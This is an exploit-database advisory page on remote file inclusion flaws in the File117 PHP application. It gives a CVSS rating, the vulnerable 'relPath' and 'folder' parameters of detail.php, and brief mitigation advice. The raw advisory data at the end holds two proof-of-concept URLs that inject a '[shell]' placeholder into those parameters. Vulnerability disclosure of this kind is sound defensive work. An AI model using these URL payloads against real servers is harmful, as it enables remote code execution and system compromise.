header-logo
Suggest Exploit
vendor:
File117
by:
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: File117
Affected Version From:
Affected Version To:
Patch Exists:
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Multiple Remote File Include Vulnerabilities in File117

The File117 application fails to properly sanitize user-supplied data, leading to multiple remote file inclusion vulnerabilities. An attacker can exploit these vulnerabilities by injecting malicious code through user-controlled parameters in the 'relPath' and 'folder' parameters of the 'detail.php' script. Successful exploitation can lead to compromise of the application and the underlying system, allowing the attacker to execute arbitrary code or perform other malicious activities.

Mitigation:

To mitigate these vulnerabilities, it is recommended to implement proper input validation and sanitization techniques. Additionally, ensure that the application does not allow remote file inclusion by restricting access to external resources and using secure coding practices.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23600/info

File117 is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. 

http://www.example.com/html/php/detail.php?relPath=[shell]?
http://www.example.com/html/php/detail.php?folder=[shell]?

Navigation

Suggest Exploit

Services By CQR